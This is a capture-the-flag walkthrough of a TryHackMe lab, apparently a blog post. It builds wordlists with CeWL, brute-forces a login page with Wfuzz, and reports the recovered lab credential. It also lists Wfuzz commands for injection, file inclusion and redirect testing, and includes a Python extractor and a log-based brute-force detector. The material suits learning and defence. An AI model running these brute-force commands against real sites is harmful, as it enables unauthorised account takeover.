Hello Cyber Enthusiasts! How are you doing?
Well, I'm ready with a new walkthrough of the Advent of Cyber 2023 day 4 challenges. Here is the link to the room: https://tryhackme.com/room/adventofcyber2023
This room is about creating a custom wordlist with the CeWL tool and brute-forcing /login.php with the Wfuzz tool. It is a beginner-friendly room, and the challenges are easy to do.
You can follow along with the instructions they have given, and you'll get the flag easily. But first, let's understand why we need to create our own custom wordlist.
When we create our own wordlist, it lets us focus on the specific details of our target and increases the chances of finding relevant passwords.
Many tools are available to create your own custom wordlist, like CeWL, Crunch, Dymerge, and Cupp. We’re going to explore the CeWL tool because we’ll be using it to solve the challenges.
CeWL (Custom Word List Generator) is a Ruby program that crawls a URL to a defined depth and produces a list of keywords that can be used as a wordlist.
This tool is designed to create custom wordlists by scraping or spidering a target website for words, phrases, and patterns found in its content.
And we can also configure it to include or exclude certain types of words, specify word length, and perform other customizations.
You can download this tool from here: https://github.com/digininja/CeWL or install it by executing this command in the terminal of your Kali Linux.
sudo apt-get install cewl -y
That's enough introduction to the CeWL tool. Now let's explore the basic commands that you can run to create your own custom wordlist.
The basic command is:
cewl http://xyz.com
It analyzes the webpage, extracts words, and creates a wordlist.
cewl -w custom_wordlist.txt --min_word_length=6 http://xyz.com
It specifies a minimum word length of 6 characters and saves the generated wordlist to a file named “custom_wordlist.txt”.
cewl -w custom_wordlist.txt --exclude_common http://xyz.com
The --exclude_common option instructs CeWL to exclude common words, leaving a list of potentially more unique and relevant terms.
cewl -w custom_wordlist.txt --depth=3 http://xyz.com
or, equivalently:
cewl -w custom_wordlist.txt -d 3 http://xyz.com
The --depth=3 option sets the crawling depth, telling CeWL to analyze content up to three levels of links deep on the website for word extraction.
cewl -w custom_wordlist.txt --exclude "word1,word2" http://xyz.com
Generates a custom wordlist from "http://xyz.com". The --exclude option specifies words (word1, word2) to be excluded from the generated wordlist.
cewl -w custom_wordlist.txt --format=json http://xyz.com
Creates a custom wordlist from “http://xyz.com” and saves it in JSON format.
You can also see the other options and use them for your needs by executing the following command.
cewl --help
- Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep: cewl http://MACHINE_IP -d 2 -w output1.txt
- Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://MACHINE_IP -m 5 -x 10 -w output2.txt
- Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.
- Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
- Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.
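To see what these options actually collect (and why words that appear on a company's own website make poor passwords), here is a small CeWL-style extractor in Python. It is an added example, not CeWL's own Ruby code: the sample HTML is constructed, the function names are mine, and min_len, max_len, lowercase, with_numbers and exclude stand in for -m, -x, --lowercase, --with-numbers and --exclude (with_numbers keeps tokens that contain digits, as CeWL's help text describes for that flag).

```python
"""Minimal CeWL-style wordlist extractor (added example, not CeWL's code).
Runs offline on a constructed page; there is no spidering of real sites."""
import re
from html.parser import HTMLParser

# Constructed sample page standing in for a spidered site (not a real target).
SAMPLE_HTML = """<html><head><title>Best Festival Company</title>
<script>var x = 'ignoreme';</script><style>.a{color:red}</style></head>
<body><h1>Meet our team</h1>
<p>Santa's elves wish you Happiness in 2023. Contact admin@example.test.</p>
<p>Our motto: Kindness, Joy and Happiness!</p></body></html>"""

class TextExtractor(HTMLParser):
    """Collect visible text, skipping <script>/<style> bodies like a spider does."""
    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0          # depth inside script/style elements
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)

def extract_words(html, min_len=3, max_len=None, lowercase=False,
                  with_numbers=False, exclude=()):
    """Return candidate words ordered by frequency (most common first), as CeWL does."""
    parser = TextExtractor()
    parser.feed(html)
    text = " ".join(parser.parts)
    # Without with_numbers only pure alphabetic runs count as words.
    pattern = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    counts = {}
    for tok in re.findall(pattern, text):
        if lowercase:
            tok = tok.lower()
        if len(tok) < min_len or (max_len and len(tok) > max_len):
            continue
        if tok in exclude:
            continue
        counts[tok] = counts.get(tok, 0) + 1
    return sorted(counts, key=lambda w: (-counts[w], w))

if __name__ == "__main__":
    print(extract_words(SAMPLE_HTML, min_len=5, with_numbers=True))
```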
The other tool used in this room is Wfuzz.
Wfuzz is a tool designed for brute-forcing web applications. You can use it to find resources that are not linked (directories, servlets, scripts, etc.).
We can also brute-force GET and POST parameters to check for different kinds of injections (SQL, XSS, LDAP), brute-force form parameters (user/password), and perform general parameter fuzzing.
It facilitates the identification of potential security flaws by injecting payloads and analyzing the responses received from the target web application.
Wfuzz could help you secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz’s web application vulnerability scanner is supported by plugins. Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Building plugins is simple and takes little more than a few minutes. Wfuzz exposes a simple language interface to the previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions without relying on a web application scanner's underlying implementation.
You can download the Wfuzz tool from this link: https://github.com/xmendez/wfuzz.git
Or execute this command:
pip3 install wfuzz
You can see the different options that you can use as per your needs with:
wfuzz -h or wfuzz --help
The basic command we can use:
wfuzz -c -z file,payload.txt -d "param1=FUZZ&param2=value" -u "http://example.com/page"
-c: Colorize output
-z file,payload.txt: Specify a payload, here a wordlist file
-d "param1=FUZZ&param2=value": Specify data for the POST request; FUZZ marks where each payload is substituted
-u "http://example.com/page": Specify the target URL
wfuzz -c -z file,payload.txt -u "http://example.com/page?param=FUZZ"
Perform a GET request with payloads on the specified parameter.
wfuzz -c -z file,payload.txt -d "param=FUZZ" -u "http://example.com/page"
Perform a POST request with payloads on the specified parameter.
wfuzz -c -z file,payload.txt -H "Cookie: session=FUZZ" -u "http://example.com/page"
Inject payloads into the session cookie.
wfuzz -c -z file,payload.txt -H "CustomHeader: FUZZ" -u "http://example.com/page"
Inject payloads into a custom header.
wfuzz -c -z file,/path/to/filenames.txt -u "http://example.com/page?file=FUZZ"
Test for file inclusion vulnerabilities.
wfuzz -c --hh 2 -z file,payload.txt --method FUZZ -u "http://example.com/page"
Brute-force HTTP methods (GET, POST, PUT, DELETE, etc.); --hh 2 hides responses whose body is 2 characters long.
wfuzz -c --hw 1 -z file,payload.txt --follow -u "http://example.com/page?redirect=FUZZ"
Test for URL redirection vulnerabilities; --hw 1 hides responses containing a single word, and --follow follows redirects.
Now let's move to the given challenge. First, start the target machine and the AttackBox.
Copy the machine's IP address, then open the browser in the AttackBox and visit http://MACHINE_IP
You will get this web page; explore the whole page. When you click on Employee Portal, you will get a login page.
When I tried to input a random username and password, it told me, "Please enter the correct login credentials".
So now let's create our own custom wordlist, and then we'll brute-force this page to get the correct credentials.
We need two wordlists: users.txt for the usernames and passwords.txt for the passwords.
So let's create them.
cewl -d 2 -m 5 -w passwords.txt http://machine_ip --with-numbers
It will create a password wordlist for us with a minimum word length of 5 characters, including words that contain numbers, after spidering two levels deep.
Now create another wordlist for users.
cewl -d 0 -m 5 -w users.txt http://machine_ip/team.php --lowercase
We are extracting usernames from the team.php page because there is a high chance that it lists the employees' names; -d 0 keeps CeWL on that single page and --lowercase normalizes the result.
And with that we have our username wordlist.
Both wordlists are ready, so now we can proceed with brute-forcing, and we'll use the Wfuzz tool for that.
wfuzz -c -z file,users.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://MACHINE_IP/login.php -d "username=FUZZ&password=FUZ2Z"
-z file,users.txt loads the username list generated from team.php.
-z file,passwords.txt uses the password list generated by CeWL.
--hs "Please enter the correct credentials" hides responses containing the string "Please enter the correct credentials", which is the message displayed for wrong login attempts, so only a successful login is shown.
-u specifies the target URL.
-d "username=FUZZ&password=FUZ2Z" provides the POST data format, where FUZZ will be replaced by entries from the first payload (usernames) and FUZ2Z by entries from the second (passwords).
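From the defender's side, a run like the one above leaves a distinctive trace in the web server's access log: dozens of POSTs to /login.php from one client within seconds. The following added example (not part of the room) flags that pattern over constructed combined-format log lines; it keys on request rate rather than status code because the page reports a failed login only as an on-page message, and the threshold and window are assumptions a defender would tune to their own traffic.

```python
"""Flag login brute-forcing in web access logs (added example, not from the room).
Log lines below are constructed; threshold/window are assumed tuning values."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)')

# Constructed sample: 10.0.0.5 hammers /login.php, 10.0.0.9 is a normal user.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 - - [04/Dec/2023:10:00:{i:02d} +0000] "POST /login.php HTTP/1.1" 200 512'
     for i in range(30)]
    + ['10.0.0.9 - - [04/Dec/2023:10:00:10 +0000] "GET /team.php HTTP/1.1" 200 2048',
       '10.0.0.9 - - [04/Dec/2023:10:00:25 +0000] "POST /login.php HTTP/1.1" 200 512'])

def parse_line(line):
    """Return (ip, timestamp, method, path) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]

def find_bruteforce(log_text, path="/login.php", threshold=20, window_s=60):
    """Return {ip: peak_attempts} for clients that issued at least `threshold`
    POSTs to `path` inside any sliding window of `window_s` seconds."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    offenders = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        ip, ts, method, req_path = rec
        if method != "POST" or req_path != path:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            offenders[ip] = max(offenders.get(ip, 0), len(q))
    return offenders

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```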
We get our username and password isalas:Happiness.
Let's log in to the webpage. We get this page.
In the second message, we can see that there is a confidential message. When we open it, we get our flag.
With that, we have completed both challenges of this room. We'll keep bringing walkthroughs for the challenges every day.
Don't forget to check out our YouTube channel, Ethical Empire. If you have any doubts, you can connect with me on LinkedIn and feel free to ask.